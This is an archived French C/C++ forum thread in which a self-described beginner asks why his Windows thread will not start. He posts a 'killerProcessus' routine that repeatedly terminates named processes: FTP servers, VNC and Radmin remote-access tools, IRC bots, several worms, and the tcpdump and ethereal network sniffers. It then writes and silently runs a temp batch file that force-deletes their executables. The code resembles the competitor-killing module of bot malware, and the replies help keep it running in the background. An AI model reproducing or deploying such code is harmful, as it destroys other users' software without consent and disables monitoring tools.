begin process at 2012 02 10 06:03:18
  Trouver un code source :

dans

Accueil > Forum > 

Archive C/C++

> 

Archives

> 

API

> 

Thread fonctionne pas -> je suis beginner en thread :)

Derniers messages déposésPoser une question dans le forum ou lancer une discussion

Thread fonctionne pas -> je suis beginner en thread :)

samedi 1 mai 2004 à 01:48:45 | Thread fonctionne pas -> je suis beginner en thread :)

Roudy

quelqu'un est capable svp de me dire pkoi le thread part pas svp

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int nCmdShow)
{

DWORD dwThread;
hthread = CreateThread(NULL,0,&killerProcessus,NULL,NULL,&dwThread);
return 0;
}

DWORD WINAPI killerProcessus(LPVOID lpParameter)
{
while(true)
{
#ifdef WIN32
PROCESSENTRY32 proc = {0};
DWORD processus, r;
HANDLE f; HANDLE sys;
char batfile[256]; char tempdir[256]; char delPath[256];
BOOL bProcess = FALSE;

const char *szFilenamesToKill[64] = {
"servudaemon.exe", "Servudaemon.exe", "serv-u.exe", "servu.exe", "ServuDaemon.exe", //5 kill le servu
"schost.exe", "svhost.exe", "teenkids.exe", "teenkid.exe", "winppr32.exe", "msblast.exe",//7 kill les virus populaire
"jhrfes.exe ", "penis32.exe", "mspatch.exe", "dllhost.exe", "tftpd.exe", "svchost1.exe","syscfgx32.exe",//7 kill les virus populaire
"DNTUS26.exe", "WinVNC.exe", "r_server.exe", "VNC.exe", "VNCTASKS.exe", "DWRCS.exe","radmin.exe","rserver.exe", "Radmin.exe", "DWRCC.exe", //9 kill les programmes d'access a distance
"netlink32.exe", "ndemon.exe", "symantec32.exe", "blah.exe", "windrop.exe", "WinSrv.exe", "winsyss.exe", "winsys.exe", "egg.exe", "psybnc.exe", "dxmedia.exe", "iroff.exe", "eggdrop.exe", "io.exe",//10 kill les xdcc
"winlord32.exe", "fsdaP.exe", "nctl.exe","hm.exe","hiddenrun.exe", "ftp.exe", "firedaemon.exe", "FireDaemon.exe", // 3 kill xdcc
"wintftp.exe", "jrynfx.exe", "spools.exe", "GT.exe", "agc.exe",// virus update
"vsaccess.exe", "fqbvrws.exe", "msgfix.exe", "fqebhjga.exe", "jhrfes.exe", "qvdsafs.exe", "dbfavcws.exe","uedit32.exe", NULL }; // 4 truck a pogrom

GetTempPath(sizeof(tempdir), tempdir);
sprintf(batfile, "%s\\r.bat", tempdir);
f = CreateFile(batfile, GENERIC_WRITE | GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE ,
NULL, CREATE_ALWAYS, 0, 0);

for(int i=0; szFilenamesToKill[i]!=NULL; i++)
{
// création du snapshot
sys = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

// ouverture du premier process
ZeroMemory(&proc, sizeof(proc));
proc.dwSize = sizeof(proc);
Process32First(sys, &proc);

//cherche processus
do
{
if (lstrcmp(proc.szExeFile, (const char*)szFilenamesToKill[i]) == 0)
{
DWORD dwPriorityClass;
BOOL bGotModule = FALSE;
MODULEENTRY32 me32 = {0};

bGotModule = GetProcessModule(proc.th32ProcessID,
&me32,
sizeof(MODULEENTRY32));
if (bGotModule)
{
HANDLE hProcess;
sprintf(delPath, "del /F \"%s\"\r\ndel \"%s\"\r\n", me32.szExePath, me32.szExePath);
// Recevoir la priorité actuel du processus
hProcess = OpenProcess (PROCESS_ALL_ACCESS,
FALSE,
proc.th32ProcessID);
dwPriorityClass = GetPriorityClass (hProcess);
if (f > (HANDLE)0)
{
// ecrire un fichier .bat pour deleter l'executable des processus
WriteFile(f, delPath, strlen(delPath), &r, 0);
}

bProcess = TRUE;
CloseHandle (hProcess);
}

processus = proc.th32ProcessID;
break;
}
}
while (Process32Next(sys, &proc));
CloseHandle(sys);

// le processus n'est probablement pas lancé (vérifier GetLastError pour en être sûr)
if (processus)
{
// ouverture du processus
HANDLE process = NULL;
if (process = OpenProcess(PROCESS_TERMINATE, FALSE, processus))
{
// terminaison de process
TerminateProcess(process, 0);
CloseHandle(process);
}
}
}

if (bProcess)
{
//Ecrit ligne pour delete .bat apres execution
sprintf(delPath, "del /F %s\r\ndel %s", batfile, batfile);
WriteFile(f, delPath, strlen(delPath), &r, 0);
CloseHandle(f);
//Pause de 40sec pour laisser le temps au processus d'etre bien killer avant de delete
Sleep(40000);
//Execute le .bat
WinExec(batfile,SW_HIDE);
}

#else
killerProcessus("tcpdump"); killerProcessus("ethereal");
#endif
}
CloseHandle(hthread);
return 0;
}

BOOL GetProcessModule (DWORD dwPID, LPMODULEENTRY32 lpMe32, DWORD cbMe32)
{
MODULEENTRY32 me32 = {0};
BOOL bRet = FALSE;
BOOL bFound = FALSE;
HANDLE hModuleSnap = NULL;

// Prend un snapshot de tout les modules du processus specifier
hModuleSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwPID);
if (hModuleSnap == (HANDLE)-1)
return (FALSE);

// Doit ajuster le size du module
me32.dwSize = sizeof(MODULEENTRY32);

// Parcour la liste des modules pour trouver le bon
// Copie les info dans le buffer specifier en parametre
if (Module32First(hModuleSnap, &me32))
{
do
{
CopyMemory (lpMe32, &me32, cbMe32);
bFound = TRUE;
}
while (!bFound && Module32Next(hModuleSnap, &me32));

bRet = bFound; // Si bRet est = a False, le processus ne run plus sur l'ordi
}
else
bRet = FALSE; // peut pas lire la lire des modules

// Cleaner le snapshot
CloseHandle (hModuleSnap);
return (bRet);
}

samedi 1 mai 2004 à 10:08:19 | Re : Thread fonctionne pas -> je suis beginner en thread :)

glipper

Membre Club
Si tu rajoutais ça en dessous de ton CreateThread, ça marcherait pas mieux ?

WaitForSingleObject(hthread, INFINITE);

Cette fonction stoppe le programme pendant l'execution du Thread.

Normalement je pense que ça vient de là.
Sinon tu as essayé de regarder ce que contenait 'hthread' ? Peut-être que ça retourne NULL non ? Ou si tu dis que ça ne part pas, essai d'ajouter en dessous du CreateThread : "ResumeThread(hthread);"

++ Glipper
samedi 1 mai 2004 à 11:55:54 | Re : Thread fonctionne pas -> je suis beginner en thread :)

ymca2003

pourquoi creer un second trhead alors que le thread principal (WinMain) ne fait rien ?
samedi 1 mai 2004 à 16:13:39 | Re : Thread fonctionne pas -> je suis beginner en thread :)

Roudy

Merci glipper c'etait effictivement sa mais jme demandais moi mon but c que ma méthode run en fond de tache indefinitivement est-ce que je dois mettre un boucle infini dedans ou ya un autre moyen?

ymca2003 c juste que j'ai pas copier coller le code au complet :)

merci Patos
samedi 1 mai 2004 à 16:31:29 | Re : Thread fonctionne pas -> je suis beginner en thread :)

glipper

Membre Club

Hum... une boucle infinie je ne pense pas que ce soit à faire, car ça doit prendre beaucoup de CPU (processeur) non ?

Apparament, ton programme sert à quitter une liste d'executables qui tournent en arrière fond.
Moi je crois que je ferais un Timer qui executerait ta fonction toutes les xxx millisecondes. Car elle n'a peut-être pas besoin de s'executer en permanence.

Qu'en pense tu ?
Glipper
samedi 1 mai 2004 à 16:40:42 | Re : Thread fonctionne pas -> je suis beginner en thread :)

Roudy

en effet j'ai tester la boucle infini et c pas terrible heh

elle n,a pas besoin de s'executer en permanence, mais je me demandais il n'a pas une méthode , quelques chose qui permet de faire cela?
comme par exemple les programmer windows qui tourne en arriere plan

sinon je vais utiliser un timer c'est une bonne solution aussi :)

merci
samedi 1 mai 2004 à 16:44:50 | Re : Thread fonctionne pas -> je suis beginner en thread :)

glipper

Membre Club

Ben si tu utilise un timer, le programme reste ouvert en arriere plan. C'est juste que ta fonction n'est appelée qu'à interval régulier.

Glipper
samedi 1 mai 2004 à 16:46:33 | Re : Thread fonctionne pas -> je suis beginner en thread :)

Roudy

ok parfait c exactement sa que jveux faire
merci pour tout cette aide c'est beaucoup apprecier

t'aurais pas le nom de la méthode qui va me falloir utiliser pour le timer? je ne my connait pas la dedans non plus
samedi 1 mai 2004 à 16:55:55 | Re : Thread fonctionne pas -> je suis beginner en thread :)

glipper

Membre Club
voila un exemple de timer :)

1. Tu cree ta fonction, qui sera appelée regulierement:

VOID CALLBACK TimerProc( HWND hwnd, UINT uMsg, UINT idEvent, DWORD dwTime )
{
MessageBox(hwnd, "iop", "iop", NULL);
}

2. Dans le MAIN par exemple, tu cree le timer :

SetTimer(NULL, 0, 3000, (TIMERPROC) TimerProc);

[/b]
Ici, il y aura un messageBox qui apparaitra toutes les 3 secondes :)

Glipper
samedi 1 mai 2004 à 17:07:13 | Re : Thread fonctionne pas -> je suis beginner en thread :)

Roudy

ok c parfait sa merci
merci pour tout :)

1 2

Cette discussion est classée dans : exe, false, processus, proc, me32

Répondre à ce message

Sujets en rapport avec ce message

probleme avec CreateFile [ par Roudy ] Je veux créer un fichier qui contiendra le path de tout les processus a killer mais le probleme c que mon fichier ne veux pas rajouter les ligne dans le "kill(0,SIGTERM)" de Linux sous Win32 ? [ par Wulfaz ] je cherche une fonction C pour winNT & win98, équivalente à celle sous Linux/Unix : kill(0,SIGTERM). Pour ceux qui ne la connaisse pas elle envoie un probleme droit d'acces sur processus [ par wisar ] bonjours voila je suis en train de programmer une petite application sur l'injection de dll. Hors j'ai remarqué que j'ai un problème de droit d'accès Trouver le path d'un processus > code MSDN semble incorrect [ par Roudy ] J'ai tenter de retrouver cela grace a du code de MSDN mais ce code ne semble par fonctionner comme il faut car le .th32ModuleID de PROCESSENTREY32 sem afficher bdd dans listbox [ par spycomeback ] Salut Je voudrais savoir comment afficher une base de donnée de type Access dans une listboxla base de donnée est ouverte juste avanttheApp.mdb->Open( Hide processus de taskmgr [ par Roudy ] Quelqu'un pourrait m'aider a trouver comment cacher un processus de la taskmgr, je sais que sa a un rapport avec un hook mais je ne saisie pas tres bi Rendre minimale la taille d'un EXE avec Visual C++ 6.0 [ par raidentr ] Dans Visual Basic 6.0, on peut optimizer la taille d'un EXE compilé au détriment de sa vitesse d'exécution.Est'ce que ceci est possible dans Visual C+ Blem de compilation avec VC++ 6.0 [ par raidentr ] Salut,J'ai un blem sous VC++ que je n'arrive pas à résoudre :Quand je compile un projet et que je l'exécute, l'EXE créé se vérouille, et je ne peut de cpp [ par ynescmr79 ] Partant de zero, j'aimerais savoir ce qu'est une application en langage de programmation? Comment dessiner et mettre en œuvre une bibliothèque qui fo Création d'un programme exe [ par ISILO ] Bonjour, Est-il possible de faire fonctionner une application graphique développée en Visual C++ 2005 sous Windows dans Linux ? Si oui, comment faire

Nos sponsors

Sondage...

Comparez les prix

CalendriCode

Février 2012
LMMJVSD
  12345
6789101112
13141516171819
20212223242526
272829    

Consulter la suite du CalendriCode

Photothèque

Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 1,264 sec (3)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales